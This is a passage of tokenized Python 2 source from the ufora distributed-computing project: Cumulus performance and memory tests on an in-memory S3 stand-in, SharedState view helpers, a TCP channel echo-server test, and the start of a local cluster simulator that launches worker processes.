InMemoryS3InterfaceFactory ( ) <EOL> rows = <NUM_LIT> <EOL> bucketData = "<STR_LIT:\n>" . join ( <EOL> [ "<STR_LIT:U+002C>" . join ( [ str ( ( ( x * row ) ** <NUM_LIT:2> ) % <NUM_LIT> ) for x in range ( <NUM_LIT:200> ) ] ) for row in range ( rows ) ] <EOL> ) <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:key>" , <EOL> bucketData <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> t0 = time . time ( ) <EOL> parsedInPython2 = [ [ float ( x ) for x in row . split ( "<STR_LIT:U+002C>" ) ] for row in bucketData . split ( "<STR_LIT:\n>" ) ] <EOL> pythonTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , memoryLimitMb = <NUM_LIT> , timeout = <NUM_LIT> ) <EOL> foraTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , memoryLimitMb = <NUM_LIT> , timeout = <NUM_LIT> ) <EOL> foraTime2 = time . time ( ) - t0 <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> self . assertEqual ( res . asResult . result . pyval , rows ) <EOL> print "<STR_LIT>" % ( foraTime , foraTime2 , pythonTime , foraTime / pythonTime ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_largeVectorRange ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> res = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:200> ) <EOL> if res . isResult ( ) : <EOL> self . assertEqual ( res . asResult . result . pyvalOrNone , <NUM_LIT> * <NUM_LIT:10> , res ) <EOL> else : <EOL> self . assertTrue ( False , res ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_sortLargeVectorRange ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix in range ( <NUM_LIT:2> ) : <EOL> t0 = time . time ( ) <EOL> self . 
computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> timeout = <NUM_LIT> <EOL> ) <EOL> foraTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> v = [ ( ix ** <NUM_LIT> % <NUM_LIT> , ix ) for ix in range ( <NUM_LIT:4> * <NUM_LIT:1000> * <NUM_LIT:1000> ) ] <EOL> v = sorted ( v ) <EOL> pyTime = time . time ( ) - t0 <EOL> print "<STR_LIT>" % ( pyTime , foraTime , pyTime / foraTime ) <EOL> def test_sortVec2 ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> ) <EOL> self . assertEqual ( result . asResult . result . pyval , True ) <EOL> def test_performManySums ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix in range ( <NUM_LIT:2> ) : <EOL> t0 = time . time ( ) <EOL> self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> <EOL> ) <EOL> foraTime = time . time ( ) - t0 <EOL> t0 = time . time ( ) <EOL> v = numpy . ones ( <NUM_LIT> ) . cumsum ( ) - <NUM_LIT:1> <EOL> for ix in range ( <NUM_LIT:100> ) : <EOL> ( v + ix ) . sum ( ) <EOL> pyTime = time . time ( ) - t0 <EOL> print "<STR_LIT>" % ( pyTime , foraTime , pyTime / foraTime ) <EOL> def test_computeManyGetitems ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> interpreterTimes = [ ] <EOL> for ix in range ( <NUM_LIT:10> ) : <EOL> interpTime = self . computeUsingSeveralWorkers ( """<STR_LIT>""" % ix , s3 , <NUM_LIT:1> , wantsStats = True , timeout = <NUM_LIT> <EOL> ) [ <NUM_LIT:1> ] . timeSpentInInterpreter <EOL> interpreterTimes . append ( interpTime ) <EOL> for interpTime in interpreterTimes [ <NUM_LIT:1> : ] : <EOL> self . assertLess ( interpTime , ( sum ( interpreterTimes ) - interpTime ) / ( len ( interpreterTimes ) - <NUM_LIT:1> ) * <NUM_LIT:10> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_gcOfPagedVectors ( self ) : <EOL> s3 = InMemoryS3Interface . 
InMemoryS3InterfaceFactory ( ) <EOL> self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> <EOL> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_produceLotsOfData ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> def test ( ) : <EOL> for worker , vdm , eventHandler in simulation . workersVdmsAndEventHandlers : <EOL> self . assertTrue ( <EOL> vdm . curTotalUsedBytes ( ) < <NUM_LIT> * <NUM_LIT> * <NUM_LIT> , <EOL> "<STR_LIT>" % ( vdm . curTotalUsedBytes ( ) / <NUM_LIT> / <NUM_LIT> ) <EOL> ) <EOL> test ( ) <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_schedulerEventsAreSerializable ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> someHadEvents = False <EOL> for worker , vdm , eventHandler in simulation . workersVdmsAndEventHandlers : <EOL> events = eventHandler . extractEvents ( ) <EOL> events2 = pickle . loads ( pickle . dumps ( events ) ) <EOL> print len ( events ) , "<STR_LIT>" <EOL> print len ( pickle . dumps ( events ) ) , "<STR_LIT>" <EOL> print len ( pickle . dumps ( events ) ) / len ( events ) , "<STR_LIT>" <EOL> self . assertTrue ( len ( events2 ) == len ( events ) ) <EOL> if len ( events ) : <EOL> someHadEvents = True <EOL> CumulusNative . replayCumulusWorkerEventStream ( events , True ) <EOL> self . assertTrue ( someHadEvents ) <EOL> worker = None <EOL> vdm = None <EOL> eventHandler = None <EOL> finally : <EOL> simulation . teardown ( ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_fanout ( self ) : <EOL> s3 = InMemoryS3Interface . 
InMemoryS3InterfaceFactory ( ) <EOL> self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> <EOL> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_vector_string_apply ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> InMemoryCumulusSimulation . computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> timeout = <NUM_LIT> <EOL> ) <EOL> def test_page_glomming_basic ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> def activePageCount ( ) : <EOL> return len ( [ x for x in sprt . getAllPages ( ) if sprt . machinesWithPageInRam ( x ) ] ) <EOL> self . assertBecomesTrueEventually ( lambda : activePageCount ( ) == <NUM_LIT:1> , <NUM_LIT> , <EOL> lambda : "<STR_LIT>" <EOL> % ( len ( sprt . getAllPages ( ) ) , sprt . getViewOfSystem ( ) ) <EOL> ) <EOL> sprt = None <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_page_glomming_multiple ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> def activePageCount ( ) : <EOL> return len ( [ x for x in sprt . getAllPages ( ) if sprt . machinesWithPageInRam ( x ) ] ) <EOL> self . assertBecomesTrueEventually ( lambda : activePageCount ( ) <= <NUM_LIT:10> , <NUM_LIT> , <EOL> lambda : "<STR_LIT>" <EOL> % ( activePageCount ( ) , sprt . getViewOfSystem ( ) ) <EOL> ) <EOL> sprt = None <EOL> finally : <EOL> simulation . 
teardown ( ) <EOL> def test_page_glomming_common_pages ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , returnSimulation = True <EOL> ) <EOL> try : <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> def noOrphanedPages ( ) : <EOL> return len ( sprt . getPagesThatAppearOrphaned ( ) ) == <NUM_LIT:0> <EOL> self . assertBecomesTrueEventually ( noOrphanedPages , <NUM_LIT> , <EOL> lambda : "<STR_LIT>" <EOL> % ( sprt . getViewOfSystem ( ) ) <EOL> ) <EOL> sprt = None <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_invalidURL ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> res = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , s3 , <NUM_LIT:1> ) <EOL> self . assertTrue ( res . isException ( ) ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_vector_transpose ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> _ , simulation = InMemoryCumulusSimulation . computeUsingSeveralWorkers ( "<STR_LIT>" , <EOL> s3 , <EOL> <NUM_LIT:2> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> timeout = <NUM_LIT:10> , <EOL> returnSimulation = True , <EOL> channelThroughputMBPerSecond = <NUM_LIT> <EOL> ) <EOL> try : <EOL> result = simulation . compute ( """<STR_LIT>""" , <EOL> timeout = <NUM_LIT> <EOL> ) <EOL> self . assertTrue ( result . isResult ( ) ) <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def disable_createVectorAndReferenceInMultipleComputations ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( <EOL> "<STR_LIT>" , <EOL> s3 , <EOL> <NUM_LIT:2> , <EOL> memoryLimitMb = <NUM_LIT:1000> , <EOL> returnSimulation = True , <EOL> useInMemoryCache = False <EOL> ) <EOL> try : <EOL> vecComputation = simulation . 
createComputation ( <EOL> """<STR_LIT>""" <EOL> ) <EOL> predComp = simulation . createComputation ( "<STR_LIT>" , vecs = vecComputation ) <EOL> regComp = simulation . createComputation ( "<STR_LIT>" , vecs = vecComputation ) <EOL> predCompStr = simulation . createComputation ( "<STR_LIT>" , pred = predComp ) <EOL> regCompStr = simulation . createComputation ( "<STR_LIT>" , reg = regComp ) <EOL> vecSumComp = simulation . createComputation ( "<STR_LIT>" , vecs = vecComputation ) <EOL> simulation . submitComputation ( predCompStr ) <EOL> simulation . submitComputation ( regCompStr ) <EOL> simulation . submitComputation ( vecSumComp ) <EOL> r1 = simulation . waitForAnyResult ( timeout = <NUM_LIT> ) <EOL> r2 = simulation . waitForAnyResult ( timeout = <NUM_LIT> ) <EOL> r3 = simulation . waitForAnyResult ( timeout = <NUM_LIT> ) <EOL> sprt = simulation . getWorker ( <NUM_LIT:0> ) . getSystemwidePageRefcountTracker ( ) <EOL> totalGb = sum ( [ x . bytecount for x in sprt . getAllActivePages ( ) ] ) / <NUM_LIT> / <NUM_LIT> / <NUM_LIT> <EOL> logging . critical ( "<STR_LIT:%s>" , sprt . getViewOfSystem ( ) ) <EOL> self . assertTrue ( totalGb < <NUM_LIT> , totalGb ) <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_vectorCreateCloseToLimit ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> result , simulation = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> timeout = <NUM_LIT> , <EOL> returnSimulation = True , <EOL> useInMemoryCache = False <EOL> ) <EOL> try : <EOL> for ix in range ( simulation . getWorkerCount ( ) ) : <EOL> self . assertEqual ( <EOL> simulation . getWorkerVdm ( ix ) . getOfflineCache ( ) . cacheItemCount , <EOL> <NUM_LIT:0> <EOL> ) <EOL> except : <EOL> simulation . dumpSchedulerEventStreams ( ) <EOL> raise <EOL> finally : <EOL> simulation . teardown ( ) <EOL> def test_vecWithinVecReading ( self ) : <EOL> s3 = InMemoryS3Interface . 
InMemoryS3InterfaceFactory ( ) <EOL> result = self . computeUsingSeveralWorkers ( """<STR_LIT>""" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> timeout = <NUM_LIT> , <EOL> useInMemoryCache = False <EOL> ) <EOL> self . assertTrue ( result . isResult ( ) ) <EOL> self . assertTrue ( result . asResult . result . pyval == True ) <EOL> def test_expansionWithVecOfVec ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> simulation = InMemoryCumulusSimulation . InMemoryCumulusSimulation ( <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT:1> , <EOL> memoryPerWorkerMB = <NUM_LIT:100> , <EOL> threadsPerWorker = <NUM_LIT:2> , <EOL> s3Service = s3 <EOL> ) <EOL> try : <EOL> self . assertTrue ( simulation . waitForGlobalScheduler ( timeout = <NUM_LIT> ) ) <EOL> simulation . getGlobalScheduler ( ) . setCheckpointStatusInterval ( <NUM_LIT> ) <EOL> simulation . submitComputation ( "<STR_LIT>" ) <EOL> simulation . waitForAnyResult ( ) <EOL> simulation . addWorker ( ) <EOL> self . assertTrue ( simulation . waitForHandshake ( ) ) <EOL> finally : <EOL> simulation . teardown ( ) </s>
<s> import logging <EOL> import time <EOL> import threading <EOL> import ufora . native . SharedState as SharedStateNative <EOL> import ufora . native . Json as NativeJson <EOL> MessageOut = getattr ( SharedStateNative , '<STR_LIT>' ) <EOL> MessageIn = getattr ( SharedStateNative , '<STR_LIT>' ) <EOL> LogEntry = getattr ( SharedStateNative , '<STR_LIT>' ) <EOL> InMemoryChannel = SharedStateNative . InMemoryChannel <EOL> KeyRange = SharedStateNative . makeKeyRange <EOL> KeyRangeSet = SharedStateNative . KeyRangeSet <EOL> Key = SharedStateNative . Key <EOL> Keyspace = SharedStateNative . Keyspace <EOL> getClientInfoKeyspace = SharedStateNative . getClientInfoKeyspace <EOL> trxTime = <NUM_LIT:0> <EOL> def Listener ( view ) : <EOL> """<STR_LIT>""" <EOL> listener = SharedStateNative . Listener ( ) <EOL> listener . listenToView ( view ) <EOL> return listener <EOL> class Transaction ( object ) : <EOL> def __init__ ( self , v ) : <EOL> assert v . connected , "<STR_LIT>" <EOL> self . v = v <EOL> def __enter__ ( self ) : <EOL> self . v . begin ( ) <EOL> self . t = time . time ( ) <EOL> def __exit__ ( self , * args ) : <EOL> global trxTime <EOL> if args [ <NUM_LIT:0> ] is None and self . v . connected : <EOL> self . v . end ( ) <EOL> else : <EOL> self . v . abort ( ) <EOL> trxTime += time . time ( ) - self . t <EOL> def iterKeys ( view , keyspace ) : <EOL> assert view . isFrozen <EOL> key = view . nextKey ( Key ( keyspace , tuple ( NativeJson . lowestValue ( ) for x in range ( keyspace . dimension ) ) ) ) <EOL> while key is not None : <EOL> yield key <EOL> key = view . nextKey ( key ) <EOL> def iterItems ( view , keyspace ) : <EOL> for key in iterKeys ( view , keyspace ) : <EOL> yield key , view [ key ] <EOL> def subscribeToClientInfoKeyspace ( view ) : <EOL> introspectionKeyspace = getClientInfoKeyspace ( ) <EOL> keyrange = KeyRange ( introspectionKeyspace , <NUM_LIT:1> , None , None , True , False ) <EOL> view . 
subscribe ( keyrange ) <EOL> def connectedClientInfo ( view ) : <EOL> """<STR_LIT>""" <EOL> clientInfoKeyspace = SharedStateNative . getClientInfoKeyspace ( ) <EOL> k = view . nextKey ( Key ( clientInfoKeyspace , ( NativeJson . lowestValue ( ) , NativeJson . lowestValue ( ) ) ) ) <EOL> maxId = <NUM_LIT:0> <EOL> tr = set ( ) <EOL> while k is not None : <EOL> if k . keyspace != clientInfoKeyspace . name : <EOL> return tr , maxId <EOL> if view [ k ] . value ( ) != NativeJson . Json ( '<STR_LIT>' ) : <EOL> tr . add ( k [ <NUM_LIT:1> ] ) <EOL> maxId = max ( maxId , view [ k ] . id ( ) ) <EOL> k = view . nextKey ( k ) <EOL> return tr , maxId <EOL> def connectedClientIDs ( view ) : <EOL> tr = connectedClientInfo ( view ) <EOL> return tr [ <NUM_LIT:0> ] </s>
<s> import unittest <EOL> import threading <EOL> import ufora . config . Setup as Setup <EOL> import ufora . networking . ChannelListener as ChannelListener <EOL> import ufora . util . ManagedThread as ManagedThread <EOL> import ufora . distributed . SharedState . Connections . TcpChannelFactory as TcpChannelFactory <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> callbackScheduler = CallbackScheduler . singletonForTesting ( ) <EOL> class ChannelEchoServer ( ChannelListener . ChannelListener ) : <EOL> def __init__ ( self , port , echoMultiplier = <NUM_LIT:1> , sizeMultiplier = <NUM_LIT:1> ) : <EOL> super ( ChannelEchoServer , self ) . __init__ ( callbackScheduler , port ) <EOL> self . _echoMultiplier = echoMultiplier <EOL> self . _sizeMultiplier = sizeMultiplier <EOL> self . channels = [ ] <EOL> self . threads = [ ] <EOL> self . _stopFlag = threading . Event ( ) <EOL> self . channelConnectCallback = self . _channelConnectCallback <EOL> def _channelConnectCallback ( self , channel ) : <EOL> channel = channel . makeQueuelike ( callbackScheduler ) <EOL> t = ManagedThread . ManagedThread ( target = self . _echoLoop , args = ( channel , ) ) <EOL> t . start ( ) <EOL> self . threads . append ( t ) <EOL> self . channels . append ( t ) <EOL> def teardown ( self ) : <EOL> super ( ChannelEchoServer , self ) . stop ( ) <EOL> self . _stopFlag . set ( ) <EOL> for t in self . threads : <EOL> t . join ( ) <EOL> def _echoLoop ( self , channel ) : <EOL> while not self . _stopFlag . is_set ( ) : <EOL> try : <EOL> toEcho = channel . get ( ) <EOL> except UserWarning : <EOL> return <EOL> try : <EOL> if self . _sizeMultiplier > <NUM_LIT:1> : <EOL> toEcho = toEcho * self . _sizeMultiplier <EOL> for i in range ( self . _echoMultiplier ) : <EOL> channel . write ( toEcho ) <EOL> except UserWarning : <EOL> return <EOL> class ChannelFactoryTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . port = Setup . config ( ) . 
testPort <EOL> def test_socket_listener ( self ) : <EOL> server = ChannelEchoServer ( self . port ) <EOL> try : <EOL> thread = ManagedThread . ManagedThread ( target = server . start ) <EOL> thread . start ( ) <EOL> server . blockUntilReady ( ) <EOL> stringChannelFactory = TcpChannelFactory . TcpStringChannelFactory ( callbackScheduler ) <EOL> channel = stringChannelFactory . createChannel ( <EOL> ( '<STR_LIT:localhost>' , self . port ) <EOL> ) <EOL> channel = channel . makeQueuelike ( callbackScheduler ) <EOL> toSend = "<STR_LIT>" <EOL> channel . write ( toSend ) <EOL> self . assertEquals ( toSend , channel . get ( ) ) <EOL> finally : <EOL> try : <EOL> server . teardown ( ) <EOL> except UserWarning : <EOL> pass <EOL> thread . join ( ) <EOL> def test_socket_channel_shutdown ( self ) : <EOL> done = threading . Event ( ) <EOL> listener = ChannelListener . SocketListener ( self . port ) <EOL> listener . registerConnectCallback ( lambda sock , address : done . set ( ) ) <EOL> try : <EOL> thread = ManagedThread . ManagedThread ( target = listener . start ) <EOL> thread . start ( ) <EOL> listener . blockUntilReady ( ) <EOL> TcpChannelFactory . TcpStringChannelFactory ( callbackScheduler ) . createChannel ( ( '<STR_LIT:localhost>' , self . port ) ) <EOL> self . assertTrue ( done . wait ( <NUM_LIT:2> ) ) <EOL> finally : <EOL> listener . stop ( ) <EOL> thread . join ( ) </s>
<s> import time <EOL> import logging <EOL> import os <EOL> import ufora . core . SubprocessRunner as SubprocessRunner <EOL> import traceback <EOL> import threading <EOL> import sys <EOL> import uuid <EOL> import ufora . util . KillProcessHoldingPort as KillProcessHoldingPort <EOL> import ufora . config . Setup as Setup <EOL> import ufora . util . DirectoryScope as DirectoryScope <EOL> import ufora . cumulus . distributed . CumulusGatewayRemote as CumulusGatewayRemote <EOL> import ufora . cumulus . distributed . CumulusActiveMachines as CumulusActiveMachines <EOL> import ufora . distributed . SharedState . Connections . TcpChannelFactory as TcpChannelFactory <EOL> import ufora . distributed . SharedState . Connections . ViewFactory as ViewFactory <EOL> import ufora . FORA . VectorDataManager . VectorDataManager as VectorDataManager <EOL> import ufora . util . OutOfProcessDownloader as OutOfProcessDownloader <EOL> import ufora . util . CodeCoverage as CodeCoverage <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> WAIT_FOR_RELAY_TERMINATION_TIMEOUT_SECONDS = CodeCoverage . adjusted_timeout ( <NUM_LIT> ) <EOL> WAIT_FOR_SERVICE_TERMINATION_TIMEOUT_SECONDS = CodeCoverage . adjusted_timeout ( <NUM_LIT> ) <EOL> STOP_MESSAGE = "<STR_LIT>" <EOL> def simulationDirName ( ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , time . strftime ( '<STR_LIT>' ) ) <EOL> def makeUniqueDir ( ) : <EOL> newDirName = simulationDirName ( ) <EOL> i = <NUM_LIT:0> <EOL> while os . path . exists ( newDirName ) : <EOL> newDirName = simulationDirName ( ) + ( '<STR_LIT>' % i ) <EOL> i += <NUM_LIT:1> <EOL> logging . info ( '<STR_LIT>' , newDirName ) <EOL> os . makedirs ( newDirName ) <EOL> return newDirName <EOL> class WorkerProcesses ( object ) : <EOL> def __init__ ( self , worker_path ) : <EOL> self . worker_path = worker_path <EOL> self . desired = <NUM_LIT:0> <EOL> self . num_ever_started = <NUM_LIT:0> <EOL> self . processes = { } <EOL> self . 
threads = { } <EOL> def desireNumberOfWorkers ( self , count , blocking = False ) : <EOL> logging . info ( '<STR_LIT>' , count ) <EOL> self . desired = count <EOL> delta = count - len ( self . threads ) <EOL> if delta > <NUM_LIT:0> : <EOL> self . _addWorkers ( delta ) <EOL> elif delta < <NUM_LIT:0> : <EOL> self . _removeWorkers ( - delta ) <EOL> def startService ( self ) : <EOL> pass <EOL> def stopService ( self ) : <EOL> self . _removeWorkers ( len ( self . threads ) ) <EOL> def _addWorkers ( self , count ) : <EOL> for _ in range ( count ) : <EOL> self . _addWorker ( ) <EOL> def _removeWorkers ( self , count ) : <EOL> while count > <NUM_LIT:0> : <EOL> worker_id , proc = self . processes . iteritems ( ) . next ( ) <EOL> thread = self . threads [ worker_id ] <EOL> del self . processes [ worker_id ] <EOL> del self . threads [ worker_id ] <EOL> proc . stop ( ) <EOL> thread . join ( ) <EOL> count -= <NUM_LIT:1> <EOL> def _addWorker ( self ) : <EOL> worker_id = uuid . uuid4 ( ) <EOL> thread = threading . Thread ( target = self . _runWorker , <EOL> args = ( worker_id , Setup . config ( ) . fakeAwsBaseDir ) ) <EOL> self . threads [ worker_id ] = thread <EOL> thread . start ( ) <EOL> @ staticmethod <EOL> def _workerLogFile ( worker_id , iteration , logDir ) : <EOL> return os . path . join ( logDir , <EOL> "<STR_LIT>" % ( worker_id , iteration ) ) <EOL> def _runWorker ( self , worker_id , logDir ) : <EOL> iteration = <NUM_LIT:0> <EOL> while worker_id in self . threads : <EOL> iteration += <NUM_LIT:1> <EOL> log_path = self . _workerLogFile ( worker_id , iteration , logDir ) <EOL> logging . info ( "<STR_LIT>" , self . worker_path , log_path ) <EOL> with open ( log_path , '<STR_LIT:a>' ) as logfile : <EOL> def writeline ( msg ) : <EOL> logfile . write ( msg + '<STR_LIT:\n>' ) <EOL> env = dict ( os . environ ) <EOL> env [ '<STR_LIT>' ] = str ( <NUM_LIT> + <NUM_LIT:2> * self . num_ever_started ) <EOL> self . num_ever_started += <NUM_LIT:1> <EOL> proc = SubprocessRunner . 
SubprocessRunner ( <EOL> [ sys . executable , '<STR_LIT>' , self . worker_path ] , <EOL> writeline , <EOL> writeline , <EOL> env = env <EOL> ) <EOL> logfile . write ( "<STR_LIT>" ) <EOL> logging . info ( "<STR_LIT>" , worker_id ) <EOL> logfile . flush ( ) <EOL> proc . start ( ) <EOL> self . processes [ worker_id ] = proc <EOL> proc . wait ( ) <EOL> logging . info ( "<STR_LIT>" , worker_id ) <EOL> class RunForeverCommand : <EOL> def __init__ ( self , foreverCommand , script , environ , timeout ) : <EOL> self . foreverCommand = foreverCommand <EOL> self . script = script <EOL> self . environ = environ <EOL> self . timeout = timeout <EOL> def __call__ ( self ) : <EOL> args = [ '<STR_LIT>' , self . foreverCommand , self . script ] <EOL> response = [ ] <EOL> def foreverStdOut ( msg ) : <EOL> response . append ( "<STR_LIT>" % ( self . script , msg ) ) <EOL> def foreverStdErr ( msg ) : <EOL> response . append ( "<STR_LIT>" % ( self . script , msg ) ) <EOL> subprocess = SubprocessRunner . SubprocessRunner ( args , <EOL> foreverStdOut , <EOL> foreverStdErr , <EOL> self . environ ) <EOL> subprocess . start ( ) <EOL> subprocess . wait ( self . timeout ) <EOL> subprocess . stop ( ) <EOL> return "<STR_LIT:\n>" . join ( response ) <EOL> class Simulator ( object ) : <EOL> _globalSimulator = None <EOL> _originalFakeAwsDir = None <EOL> def __init__ ( self ) : <EOL> callbackSchedulerFactory = CallbackScheduler . createSimpleCallbackSchedulerFactory ( ) <EOL> self . callbackScheduler = callbackSchedulerFactory . createScheduler ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . uforaPath = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> self . sharedStatePath = os . path . join ( self . uforaPath , '<STR_LIT>' ) <EOL> self . sharedStateMainline = os . path . join ( self . sharedStatePath , '<STR_LIT>' ) <EOL> self . gatewayServiceMainline = os . path . join ( self . uforaPath , '<STR_LIT>' ) <EOL> self . webPath = os . path . join ( self . 
uforaPath , '<STR_LIT>' ) <EOL> self . relayScript = os . path . join ( self . webPath , '<STR_LIT>' ) <EOL> self . relayPort = Setup . config ( ) . relayPort <EOL> self . relayHttpsPort = Setup . config ( ) . relayHttpsPort <EOL> self . sharedStatePort = Setup . config ( ) . sharedStatePort <EOL> self . restApiPort = Setup . config ( ) . restApiPort <EOL> self . subscribableWebObjectsPort = Setup . config ( ) . subscribableWebObjectsPort <EOL> self . processPool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> self . desirePublisher = None <EOL> self . _connectionManager = None <EOL> def dumpRelayLogs ( self ) : <EOL> try : <EOL> logging . info ( "<STR_LIT>" , self . relayLogFile ) <EOL> with open ( self . relayLogFile , "<STR_LIT:r>" ) as f : <EOL> data = "<STR_LIT>" . join ( f . read ( ) . split ( "<STR_LIT:\n>" ) ) <EOL> logging . error ( "<STR_LIT>" , data ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" , traceback . format_exc ( ) ) <EOL> @ property <EOL> def relayLogFile ( self ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> @ property <EOL> def sharedStateLogFile ( self ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> @ property <EOL> def gatewayLogFile ( self ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def getGlobalSimulator ( ) : <EOL> assert Simulator . _globalSimulator is not None , '<STR_LIT>' <EOL> return Simulator . _globalSimulator <EOL> @ staticmethod <EOL> def createGlobalSimulator ( useUniqueFakeAwsDir = True ) : <EOL> os . setpgid ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if not os . path . exists ( Setup . config ( ) . fakeAwsBaseDir ) : <EOL> os . makedirs ( Setup . config ( ) . fakeAwsBaseDir ) <EOL> Simulator . _originalFakeAwsDir = Setup . config ( ) . 
